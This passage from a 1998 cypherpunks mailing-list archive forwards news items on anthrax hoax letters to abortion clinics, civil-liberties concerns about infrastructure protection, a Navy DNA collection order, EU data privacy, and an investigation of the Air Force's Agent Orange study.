Health Center in Knoxville, Tenn., agent Scott Nowinski said. The letter
appeared to be a hoax, he said. 

No one at the Indianapolis clinic complained of any symptoms after an
employee opened the letter Friday afternoon. Officials said is was unclear
whether the letter actually contained anthrax, a strain of bacteria that can
be used as a biological weapon. "We do not know that. But we are
handling it as if it were," police Maj. Tim Horty said. 

The 31 people, who included seven clinic workers, two firefighters, two
police officers and the postal carrier who delivered the letter, were
stripped, washed with soap and water and dressed in hospital scrubs
inside a blue tent in a strip mall parking lot before being taken to a local
hospital. They were given antibiotics as a preventive measure. 

All were expected to be released by Friday night. 

"No one is sick, no one is experiencing pain," Horty said. 

Horty said a clinic employee called police about 1 p.m. to report a
threatening letter. Inside a small, white envelope was a brown powdery
substance and a note saying "you have just been exposed to anthrax." 

Administrators isolated the envelope in the clinic, but didn't say where or
how, Horty said. Police evacuated all other stores in the strip mall and
immediately quarantined the clinic. 

The people exposed to the letter are being taken to Wishard, Methodist
and Community hospitals for observation, and are not in any danger, fire
Lt. Jack Cassaday said. 

The hospitals and 911 have been inundated by calls from people in the
area who think they might have been exposed, Cassaday said. 

"No one who was not inside the clinic could have possibly been exposed,"
he said. 

Anthrax is a disease normally associated with animals such as sheep or
goats. Its spores can infect people who breathe them in. It can kill if left
untreated, but antibiotics can usually cure the disease. 

Authorities in Indianapolis were in the process of having the powder
analyzed and hope to know by Monday whether it is anthrax, said Virginia
A. Caine, Marion County Health Department director. 

If the powder is confirmed to be anthrax, those exposed will have to take
antibiotics for four weeks, and possibly the anthrax vaccine as well, she
said. 

The letters were received a week after abortion provider Dr. Barnett
Slepian, 52, was shot and killed by a sniper in his home in suburban
Buffalo, N.Y. 

"We receive threats from time to time, but nothing very substantial. The
employees here did the appropriate thing. This did not look suspicious
until they opened it," said Delbert Culp, president of Planned Parenthood
of Central and Southern Indiana. 

"These are just political extremists who call themselves pro-life. This is not
pro-life." 

Ann Minnis of Haubstadt, Ind., president of Gibson County Right to Life,
an anti-abortion group, said she has been with the organization for 25
years and has "never met anyone who would do such a thing. 

"We're about saving lives, not about anything like that (the anthrax
threats)," she said. "Heavens, it's horrible." 

 (c) Copyright 1998 The Associated Press 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 3 Nov 1998 08:21:07 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Privacy: Dangers of security measures
Message-ID: <199811022344.PAA28378@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Privacy: Dangers of security measures
Date: Sat, 31 Oct 1998 09:38:16 -0600
To: believer@telepath.com

Source:  Federal Computer Week
http://www.fcw.com/pubs/fcw/1998/1026/web-epic-10-26-98.html

 OCTOBER 26, 1998 . . . 16:35 EST 

 Privacy watchdog group warns about dangers of
 security measures

 BY HEATHER HARRELD (heather@fcw.com)

 The recommendations of a presidential commission for protecting the
nation's critical computer systems -- many of which are being launched by
various federal entities -- would expand government authority and lead to
civil liberty violations, according to a report released today by a privacy
think tank.

 The report, authored by the Electronic Privacy Information Center, asserts
that the expanded role of the Defense Department and the FBI required to
ward off perceived information warfare threats to the nation's critical
infrastructures would infringe upon various civil liberties, such as
freedom of speech, privacy protections and the Freedom of Information Act. 

 Specifically, Wayne Madsen, senior fellow at EPIC and author of the
report, noted that the National Security Agency and other intelligence
agencies would have their roles expanded from collecting international
intelligence data to focusing efforts on domestic computer security.

 Traditionally, the NSA has been prohibited from playing a role in the
protection of unclassified computer security data. But because
infrastructure protection involves working closely with the private-sector
owners and operators of infrastructure, such as telecommunications
companies and banks, this role would be expanded.

 The report from the President's Commission on Critical Infrastructure
Protection supported the use of key-recovery encryption, a technology
mechanism strongly supported by the NSA that would allow law enforcement
officials to descramble encrypted data with a court order or other
authorization.

 It also suggests that the federal government create new classifications
for government information and provide federal agencies with expanded
latitude for classifying information, according to Madsen.

 "The intelligence community...has had its sights set on restricting access
to public information for years," Madsen said. "There's been a struggle
between NSA and civilian agencies over who will be responsible for
protecting unclassified information. NSA [in commission recommendations]
will become the de facto information security czar."

 But Jeffrey Hunker, director of the Critical Infrastructure Assurance
Office, which was created by President Clinton to carry out many of the
recommendations in the commission's report, said his office places First
Amendment and civil liberty concerns foremost in its work.

 "We are dealing with a new and evolving threat environment," Hunker said.
"Discussions about civil liberties need to recognize the fact that there
are new threats that pose real risks to Americans at home...and their way
of life." 

Mail questions to webmaster@fcw.com
Copyright 1998 FCW Government Technology Group
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 3 Nov 1998 08:25:15 +0800
To: cypherpunks@cyberpass.net
Subject: IP: More clinics receive "anthrax" letters as authorities await results
Message-ID: <199811022344.PAA28388@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: More clinics receive "anthrax" letters as authorities await results
Date: Sat, 31 Oct 1998 19:17:26 -0600
To: believer@telepath.com

Source:  Fox News - AP

More clinics receive letters as authorities await results
 8.00 p.m. ET (101 GMT) October 31, 1998

 By Susanna Ray, Associated Press

 INDIANAPOLIS (AP) - Federal marshals stood watch Saturday over an abortion
clinic that received a letter claiming, "You have just been exposed to
anthrax.'' Authorities meanwhile awaited results of tests on the envelope's
contents. 

 The Planned Parenthood clinic was one of five clinics that received
envelopes Friday containing a brown, powdery substance and threatening
notes. The others were in the southern Indiana town of New Albany,
Knoxville, Tenn., and two in Louisville, Ky. 

 On Saturday, two other clinics - one in Wichita, Kan., and another in
Louisville - reported receiving similar letters. 

 Authorities said the letter to the Wichita clinic was postmarked in
Cincinnati, just like the ones sent to at least four other clinics. Pat
Bashore of the FBI in Louisville said he did not know the origin of two of
the Louisville letters. 

 In Wichita, an employee called the fire department, which contacted
federal authorities. FBI spokesman Jeff Lanza said the envelope wasn't
opened but "looking at it through backlighting, it doesn't appear to
contain anything at all.'' The clinic was evacuated for about 45 minutes. 

 Friday's incident at the Indianapolis clinic prompted police to
decontaminate 31 people who were scrubbed down and treated with antibiotics
at hospitals as a precaution. Two people from a Louisville clinic also were
treated at the hospital Friday. 

 Preliminary tests on the contents of the New Albany envelope and one from
Louisville were negative for anthrax, a strain of bacteria that can be used
as a biological weapon. Contents of a letter sent to the Knoxville
Reproductive Health Center will be sent to a lab for testing, the FBI said. 

 Results of testing in the Indianapolis case had not been completed
Saturday, FBI agent Doug Garrison said. 

 Michael Smith, who lives in an apartment near the Indianapolis clinic,
said he's opposed to abortion, but now is scared about what anti-abortion
extremists might do next. 

 "You're automatically wondering what chemicals went off. I mean, my
window's open. ... I feel endangered,'' he said. 

 Meanwhile, a Newsweek poll found that 60 percent of Americans believe the
anti-abortion movement has to share at least some of the blame for recent
violence against abortion provides. Fears of violent attacks against
abortion providers were heightened Oct. 23 when a sniper fatally shot a
doctor who performs abortions near Buffalo. 

 Thirty-three percent of those responding said the anti-abortion movement
is indirectly connected to the violence because of statements that
encourage violence. Another 27 percent believed there is a more direct
connection, the Newsweek poll said. 

 The survey also found that 51 percent of Americans sympathize with
abortion-rights efforts and 39 percent back the anti-abortion effort. 

 The poll appears in the Nov. 9 issue of the magazine, which is on
newsstands Monday. Its margin of error is plus or minus 4 percentage points. 

                  (c) 1998 Associated Press. All rights reserved.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 3 Nov 1998 08:23:07 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [FP] R 141331Z-OCT-98 DNA SPECIMEN COLLECTION PROGRAM
Message-ID: <199811022344.PAA28399@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: IP: [FP] R 141331Z-OCT-98 DNA SPECIMEN COLLECTION PROGRAM
Date: Sat, 31 Oct 1998 20:59:51 -0600
To: ignition-point@majordomo.pobox.com


SCAN THIS NEWS
10/31/98

Forwarded message:

--------------------------------

I am a government contractor and have had my problems with this enumeration
demonization and now find that the alarms are rising. A close friend of
mine, who is a government employee sent this copy of an unclassified message
from the Commander of Naval Surface Pacific Command to all forces of the
Pacific command. Undoubtedly, this is also true for the Atlantic Fleet as
well as the rest of the military under the control of the Commander in
Chief. I think Ayn Rand was correct when she said, "Justice vanished from
the country when the gold coins vanished from the country's hands." It
appears that sooner than not, we will "not be able to buy or sell except he
that has the mark, or the name of the beast, or the number of his name. Here
is wisdom. Let he that has understanding calculate the number of the beast:
for it is the number of a man [His DNA?]; and his number is 666." [the
helical make-up?] Revelations 13: 17 & 18.

May God grant us the wisdom we all need for discernment in this matter.

F E

--------------------------------

Subject: R 141331Z-OCT-98 DNA SPECIMEN COLLECTION PROGRAM

R 141331Z OCT 98 ZYB PSN 475808S32
FM COMNAVSURFPAC SAN DIEGO CA//N01M//
TO NAVSURFPAC
INFO RHHMHAH/CINCPACFLT PEARL HARBOR HI//N01M//
BT
UNCLAS //N01320//PASS TO MEDICAL DEPT REPRESENTATIVES
MSGID/GENADMIN/N01M//
SUBJ/DNA SPECIMEN COLLECTION PROGRAM//
REF/A/RMG/COMNAVSURFPAC/101331Z/JUN98//
REF/B/RMG/CINCLANTFLT/021630Z/JUN98//
NARR/REF A IS READD MSG FROM BOTH CINCS REGARDING THE DNA SPECIMEN
COLLECTION PROGRAM. REF B PROVIDED GUIDANCE ON HOW TO QUERY THE
ARMED FORCES INSTITUTE OF PATHOLOGY (AFIP) DATABASE.//
POC/A.C. ABAD, HMCM(SW)/CNSP/N01M2/-/TEL:(619)437-2326
/TEL:DSN 577-2326//

RMKS/1. THE PURPOSE OF THIS MSG IS TO ALERT ALL COMNAVSURFPAC UNITS
TO THE REQUIREMENT TO REPORT THE STATUS OF THEIR DNA SPECIMEN
COLLECTION PROGRAM TO THE TYCOM. PER REFS A AND B, ALL UNITS
ARE REQUESTED TO SUBMIT REPORTS OF COMPLETION OF DNA SPECIMEN
COLLECTION TO CNSP NLT 31 OCT 98. ALL UNITS SHOULD HAVE 100 PERCENT

[PAGE 02 RUEDMCA0441 UNCLAS]

OF THEIR CREW REGISTERED IN THE ARMED FORCES REPOSITORY OF SPECIMEN
SAMPLES FOR THE IDENTIFICATION OF REMAINS (AFRSSIR) AT AFIP.

2. FOR QUESTIONS OR CLARIFICATIONS, PLS CONTACT POC. //
BT
#0441
NNNN
RTD:000-000/COPIES:

=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================




****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 3 Nov 1998 08:34:08 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 6.03: Privacy Here and Abroad
Message-ID: <199811022344.PAA28410@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 6.03: Privacy Here and Abroad
Date: Sun, 1 Nov 1998 00:06:37 -0800
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 6.03: Privacy Here and Abroad
News & Info from the Institute for the Study of Privacy Issues (ISPI)
November 1, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: The Washington Post, Saturday, October 31, 1998; Page A16
http://www.washingtonpost.com

Privacy Here and Abroad
http://search.washingtonpost.com/wp-srv/WPlate/1998-10/31/083l-103198-idx.h
tml

CONCERN OVER the privacy of personal data is sharpening as the problem
appears in more and sometimes unexpected contexts -- everything from
employer testing of people's genetic predispositions to resale of their
online reading habits or their bank records. When the data are medical or
financial, everyone but the sellers and resellers seems ready to agree that
people should have some measure of control over how and by whom their data
will be used. But how, other than piecemeal, can such control be
established, and what would a more general right to data privacy look like?

One approach very different from that of the United States, as it happens,
is about to be thrust upon the consciousness of many American businesses as
a European law called the European Union Data Privacy Directive goes into
effect. The European directive has drawn attention not only because the
European approach to and history on data privacy are sharply different from
our own but also because the new directive comes with prohibitions on
export that would crimp the options of any company that does business both
here and in Europe.

The directive imposes sweeping prohibitions on the use of any personal data
without the explicit consent of the person involved, for that purpose only
(repeated uses or resale require repeated permission) and also bars
companies from exporting any such data to any country not ruled by the EU
to have "adequate" privacy protection measures already in place. The
Europeans have not ruled the United States "adequate" in this regard -- no
surprise there -- though individual industries may pass muster or fall
under special exemptions.

That means, for instance, that multinational companies cannot allow U.S.
offices access to personnel data on European employees, and airlines can't
swap reservations data without restrictions. More to the point, they can't
share or sell the kinds of data on customers that in this country are now
routinely treated as another possible income stream. Would such restraints
be a boon to customers on these shores too? Or will Americans, as the data
companies frequently argue, find instead that they want the convenience and
"one-on-one marketing" that this constant dossier-compiling makes possible?

In one early case, a U.S. airline is being sued in Sweden to prevent its
compiling and selling a database of, for instance, passengers who requested
kosher meals or wheelchair assistance on arrival from transatlantic
flights. Do customers want the "convenience" of this kind of tracking, and
if not, how might they -- we -- avoid having it offered? The contrast
between systems is a chance to consider which of the many business-as-usual
uses of data in this country rise to the level of a privacy violation from
which citizens should be shielded by law.

(c) Copyright 1998 The Washington Post Company


--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you are concerned about the erosion
of your privacy in general, won't you please help us continue this
important work by becoming an "ISPI Supporter" or by taking out
an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.










****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 3 Nov 1998 08:57:39 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Fatal Flaws: How military misled about Agent Orange
Message-ID: <199811022344.PAA28421@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Fatal Flaws: How military misled about Agent Orange
Date: Sun, 01 Nov 1998 11:41:36 -0600
To: believer@telepath.com

Source:  San Diego Union-Tribune
http://www.union-tribune.com/news/981101-0010_mz1n1agent.html

FATAL FLAWS

How the military misled Vietnam veterans and their families about the
health risks of Agent Orange

UNION-TRIBUNE Staff Writer 

November 1, 1998 

The U.S. military's $200 million study of the health effects of Agent
Orange on Vietnam War veterans is so flawed that it might be useless, a
six-month investigation by The San Diego Union-Tribune has found.

The study has been a key factor in denying compensation to Vietnam veterans
suffering from illnesses they blame on Agent Orange, a powerful herbicide
used to destroy enemy crops and jungle hiding places.

Interviews with military scientists, transcripts of meetings, and
government reports and internal memos reveal that these are among the flaws
in the Air Force study, which began in 1979 and concludes in 2006:

Two study reports that revealed serious birth defects among children of
veterans exposed to Agent Orange were withheld for years, leaving a
generation of men and women who served in Vietnam to start families without
knowing the potential risks. 

A report expressing concerns about cancer and birth defects was altered,
with the result that the risks appeared less serious. 

The government ignored a National Academy of Sciences recommendation that
the study be done by scientists outside the military.

High-ranking Air Force officers interfered with the study' s data analysis,
undermining its scientific integrity.

The Air Force stonewalled a U.S. senator who wanted full disclosure of the
data.

Dr. Richard Albanese, one of four scientists who designed the study but
later was taken off the project, says it was manipulated to downplay the
health problems of Vietnam veterans.

"This is a medical crime, basically," Albanese said. "Certainly, this is
against all medical ethics."

Albanese, a civilian doctor, still works at Brooks Air Force Base in San
Antonio, where the study' s scientists are headquartered. 

When the Union-Tribune contacted him, Albanese weighed the consequences for
several days and then agreed to a series of interviews in the hope that
veterans will be treated better in the future.

He said the study is tainted because a government agency, in this case the
Air Force, was allowed to investigate itself.

Joel Michalek, the study' s head scientist, acknowledged that the Air Force
and the government tried to interfere, but he said this had no impact on
the study. He said he received two memos through the chain of command that
tried to influence the study, but threw them away.

The study is named for Operation Ranch Hand, a series of Air Force missions
that sprayed 18 million gallons of defoliants over 3.6 million acres of
South Vietnam. The Ranch Hand study tracks the health of about 1,000
veterans who participated in the spraying missions, in comparison with an
Air Force group that was not involved in the spraying. Both groups come to
San Diego every few years for medical exams.

Agent Orange contained dioxin, now known to cause some cancers. The
defoliant destroyed forests and darkened the waters of the Mekong Delta,
where Patti Robinson' s husband, Geoff, was a gunner' s mate on a Navy
patrol boat in 1968-69.

Robinson, who lives in Clairemont, said her husband described how the
herbicide congealed and licked at river banks. But he told her the men
bathed and swam in the water anyway; their superiors said it was safe. 

When her husband died of cancer in 1981, Robinson turned to the Veterans
Administration for help. Her claim citing Agent Orange as a factor in her
husband' s death also listed her son, Matthew, who was born in 1976 with a
developmental disability.

But the government told Robinson that Agent Orange did not cause her
husband' s malignant melanoma, nor her son' s communication disorder. Or
any other health problem for that matter.

All claims were being denied. Agent Orange was innocent until proved guilty. 

The government had made that clear in 1978, after the first 500 claims came
in. Garth Dettinger, an Air Force deputy surgeon general, told Congress
there was no evidence that Agent Orange had harmed anyone.

But concerns about the herbicide' s health effects had been raised since
the early ' 70s, and the public wanted proof. So Congress funded the Ranch
Hand study. Dettinger helped make sure it was done by Air Force scientists.  

Conflict of interest

Although Dettinger wanted the Air Force to evaluate its use of Agent
Orange, some of its scientists thought that might present a conflict of
interest. Col. George Lathrop, head scientist for the Ranch Hand study in
its early years, told a military science board in 1979 that an Air Force
study wouldn' t be credible to people outside the government.

"We advised a certain general that, ' No, we should not do this.' And we
were told to shut up and do it anyway," Lathrop said, according to a
transcript of the meeting. "So we are saluting the flag pole and mushing
on. We are doing the damn thing."

That general, Lathrop said in a recent interview, was Dettinger.

"Dettinger had the notion that if we didn' t do this study that he would
devise his own questionnaire and his own study and go out and get it done
himself," Lathrop said. "It would have been scientifically disastrous."

Dettinger denied ordering Lathrop to do the Ranch Hand study and said he
never threatened to conduct his own version.

"He' s not being honest about that," Dettinger said. "I promised Congress
we would do the study. My word is my bond, and so we went ahead and did it." 

Albanese also worried that conflict of interest might affect the findings.
But, at the time, he believed the danger could be offset by a rule written
into the study design: Air Force management was not to interfere with the
scientific analysis. 

The scientists weren' t the only ones with conflict-of-interest concerns.
The National Academy of Sciences reviewed the study design in 1980 and
recommended it be done by independent researchers. But a White House panel
made up of representatives from the Pentagon and VA, among other federal
agencies, said the Air Force would do it. The panel, called the Agent
Orange Working Group, appointed an advisory committee to review Ranch Hand
reports.

But the committee did more directing than advising during the first decade
of the study, Albanese said.

Ranch Hand reports went from the Air Force to the advisory committee, then
to the Agent Orange Working Group and back to the Air Force. Sources and
documents indicate the reports were changed during that process, sometimes
dramatically. 

Altered report

The Air Force scientists drafted two major Ranch Hand reports in 1984. 

One of them was withheld. The other was published, but its findings were
altered.

The report that was withheld dealt specifically with reproductive health
issues, and stressed birth defects and infant deaths. It showed high rates
of both among children of Ranch Hand veterans.

The report that was published examined the general health of Ranch Hand
veterans. It presented data on birth defects, cancer and many other medical
conditions. The Air Force announced that it showed little difference
between the health of Ranch Hand and comparison veterans. 

But that wasn' t what the Ranch Hand scientists wrote. Their original
version of the report contained a table showing that the Ranch Hand
veterans were, by a ratio of 5-1, "less well" than the comparison group.
That version also noted that Ranch Hand veterans reported significantly
more birth defects among their children than did the other veterans. 

After the White House panel' s advisory committee reviewed the report,
those details were downplayed or eliminated.

Lathrop complied with the committee' s recommendations to omit the table,
soften the birth defects language and drop a sentence that said Ranch Hand
veterans might have been harmed by Agent Orange. Lathrop also deleted a
sentence that said some of the findings were "of concern." He added a line
that said the overall findings were "reassuring." 

Lathrop didn' t object to the changes, which he said were minor.

"Fundamentally, the advisory group felt that we were too liberal on the
interpretation," he said.

Albanese, on the other hand, thought the changes distorted the report. He
wrote a letter requesting that his views be published as a minority
opinion, and kept a copy in his files. Lathrop, who didn' t respond to
Albanese' s letter, said he doesn' t recall receiving it. 

Albanese and Lathrop also disagreed about how the cancer data were prepared
and presented in the 1984 health report.

Because the Ranch Hand group is too small for the scientists to draw
conclusions about rare cancers, Albanese said, they decided to study the
incidence of cancer as a whole. They found that the Ranch Hand veterans had
twice as many cancers as the comparison group.

But that didn' t make it into the report.

Instead, skin and internal cancers were separated. Presented that way, the
Ranch Hand group had 135 percent more skin cancers than the comparison
group, but only 20 percent more internal cancers.

The scientists reported the high skin cancer rate, but suggested it was
caused by overexposure to the sun. They found "no significant group
differences" in internal cancers. Within the small Ranch Hand group,
Albanese said, the increase in internal cancers became a meaningless
statistic.

Albanese was outraged.

"It happened that most cancers were in the skin, and the report said they
were just in the skin," he said. "That' s not a correct inference."

At the press conference that unveiled the 1984 health findings, Murphy
Chesney, a deputy Air Force surgeon general at the time, announced that the
health of the Ranch Hand and comparison veterans was about the same. 

In response to a question during that press conference, Albanese voiced a
mild disagreement. Noting the higher incidence of some diseases, he said,
"I cannot account for such differences by chance; on the other hand, I
cannot explain their cause."

He repeated to reporters a phrase that had been deleted from the report: 

"A degree of concern is warranted."

Albanese was removed from the Ranch Hand study eight months later. The Air
Force said he was needed on a different project.

Sensitive information

Albanese considered going public with his misgivings about the Ranch Hand
study years ago, but decided against it. He didn' t want to jeopardize his
career as a government scientist.

Because of the study' s flaws, Albanese said, Vietnam veterans have not
received the compensation they deserve.

Lathrop said it was better not to release sensitive data from the Ranch
Hand study prematurely, and nothing was more sensitive than information
about birth defects.

"There was a great deal riding on the issue of birth defects," he said.
"The VA had not decided on the issue of compensation and so forth."

After her husband died, Patti Robinson struggled to meet her son' s special
needs. She needed the government compensation, but more than that, she
needed the truth.

"The uncertainty has left big question marks," she said. "If it wasn' t for
that, you could put it behind you."

Robinson never remarried. She devoted her life to her son, Matthew, who is
21 now, the age his father was in Vietnam.

Matthew has the reading skills of a second-grader, and he has a hard time
getting words out. But he can look at a photograph, identify a place he has
been and offer directions to get there.

He calls his mother by her first name and often refers to himself in the
third person. He will say, "Patti, Matthew is stupid," and his mother will
fire back, "No, you' re not."

Matthew keeps a picture of his father in his bedroom. Sometimes he shows it
to visitors.

But pain registered on his face when he was asked what he remembers about
the man who died so long ago.

He turned away.

"Matthew doesn' t want to talk about that," he said.

In the private sector

To reduce the workload of its scientists, the Air Force hired a private
company to conduct Ranch Hand general health studies published since 1984. 

But the government has remained in charge.

And the firm that won the first contract featured a familiar face.

George Lathrop had retired from the Air Force and was working at the San
Antonio office of Science Applications International Corp., a San
Diego-based company that was founded on defense contracts.

Lathrop said he wanted to continue working on the Ranch Hand study. He
figured that with him on its team, SAIC would get the contract.

It did.

Lathrop left SAIC in 1987. The company went on to win the contracts for
1987, 1992, 1997 and 2002. It uses Scripps Clinic in La Jolla to perform
the medical tests.

Results are analyzed by SAIC, then sent to scientists at Brooks Air Force
Base for approval. The SAIC contracts do not include compiling birth
defects reports. The Air Force does that itself.

By 1987, Ranch Hand had emerged as the government' s definitive Agent
Orange study.

"It was the pivotal study," said Michalek, Ranch Hand' s head scientist
since 1991. "It still is."

The U.S. Centers for Disease Control and Prevention in Atlanta tried to do
its own study by matching records of troop movements with Agent Orange
spraying. But after five years and nearly $50 million, the CDC decided its
review method wasn' t reliable.

After the CDC gave up in 1987, the government dismissed other studies that
used similar exposure estimates. They were deemed unscientific. 

That left the Ranch Hand study as the government' s principal yardstick for
Agent Orange damage.

Pattern of manipulation

South Dakota Sen. Tom Daschle, a Democrat, has kept an eye on the Ranch
Hand study since the early 1980s. He was confident it would support his
belief that Agent Orange harmed Vietnam veterans.
 
When that hadn' t happened by 1984, when Daschle was a member of the House
of Representatives, he decided to investigate. He assigned an aide, Laura
Petrou, to help. They collected Air Force and other government
correspondence and saw what they believed was a pattern of manipulation to
minimize findings of health problems among Ranch Hand veterans.

When Daschle learned about the unpublished 1984 birth defects report, he
asked for a copy. The Air Force refused to give him one.

Finally, in a letter to Daschle dated Aug. 25, 1987, the Air Force conceded
that the cancer and birth defects information in the 1984 Ranch Hand health
report -- the one Albanese said was distorted by advisory committee changes
-- might be incorrect.

Daschle then met with Albanese, Michalek and a third Ranch Hand scientist,
Col. William H. Wolfe. They told Daschle about another unpublished report,
which included some of the cancer and birth defects information that was
left out of the 1984 general health report.

Daschle fought to make the report public. The advisory committee argued
that it was a rehash of old data.

The report was released in February 1988, but it didn' t gain the attention
Daschle had hoped.

The Air Force deemed the report "technically correct" but did not publicize
it or list it among Ranch Hand publications.

One month after the report was released, Scripps Clinic issued a study
update, a press release that said the Ranch Hand veterans were doing fine.
It quoted Wolfe:

"This is the definitive study on Agent Orange in Vietnam veterans, and so
far it shows that disease is not related to apparent exposure, that there
is no increased incidence of major long-term health effects.

"These results are reassuring."

' Forbidden interpretation' Patti Robinson was not reassured. 

She had been attending meetings of San Diego veterans' groups and had read
everything she could find on Agent Orange.

Robinson also corresponded with retired Navy Adm. Elmo Zumwalt, who had
ordered the spraying of Agent Orange along the Mekong Delta to kill
vegetation where enemy snipers hid. His son, Navy Lt. j.g. Elmo Zumwalt
III, had commanded a patrol boat in the Mekong Delta, the same waters Geoff
Robinson had navigated.

Former Lt. j.g. Zumwalt died of cancer in 1988. His son, Russell, was
diagnosed with sensory integration dysfunction, the same communication
disorder that plagues Patti Robinson' s son, Matthew.

Robinson thought the Ranch Hand veterans and her husband were exposed to
roughly equal amounts of Agent Orange. She believed the Ranch Hand study
would be the one that would "prove how dangerous Agent Orange was." 

"I placed a high priority on that study," Robinson said. "I was
disappointed in the results."

The Air Force now regrets having described Ranch Hand findings as
"reassuring," Michalek said.

"That' s a forbidden interpretation," he said. "You can' t reassure anyone
of anything in (statistical studies). You can only establish hazard, not
safety." 

Daschle grew tired of fighting the Air Force on the Ranch Hand study. He
tried to find other ways to help Vietnam veterans and their families.

"Our whole point was if the government was controlling all the science and
analyses veterans would never get compensated," Petrou said.

Daschle, along with then-Sen. Alan Cranston, D-Calif., and Rep. Lane Evans,
D-Ill., pushed legislation to compensate Vietnam veterans suffering from
soft-tissue sarcoma and non-Hodgkin' s lymphoma. The bill also authorized
the National Academy of Sciences to evaluate scientific and medical
information about the health effects of Agent Orange.

Earlier attempts to pass similar legislation had failed. But toward the end
of 1990, with U.S. troops in the Persian Gulf, Congress was eager to help
veterans.

The Senate passed the bill Jan. 30, 1991, the day Camp Pendleton Marines
led the first major ground battle of the Persian Gulf War.

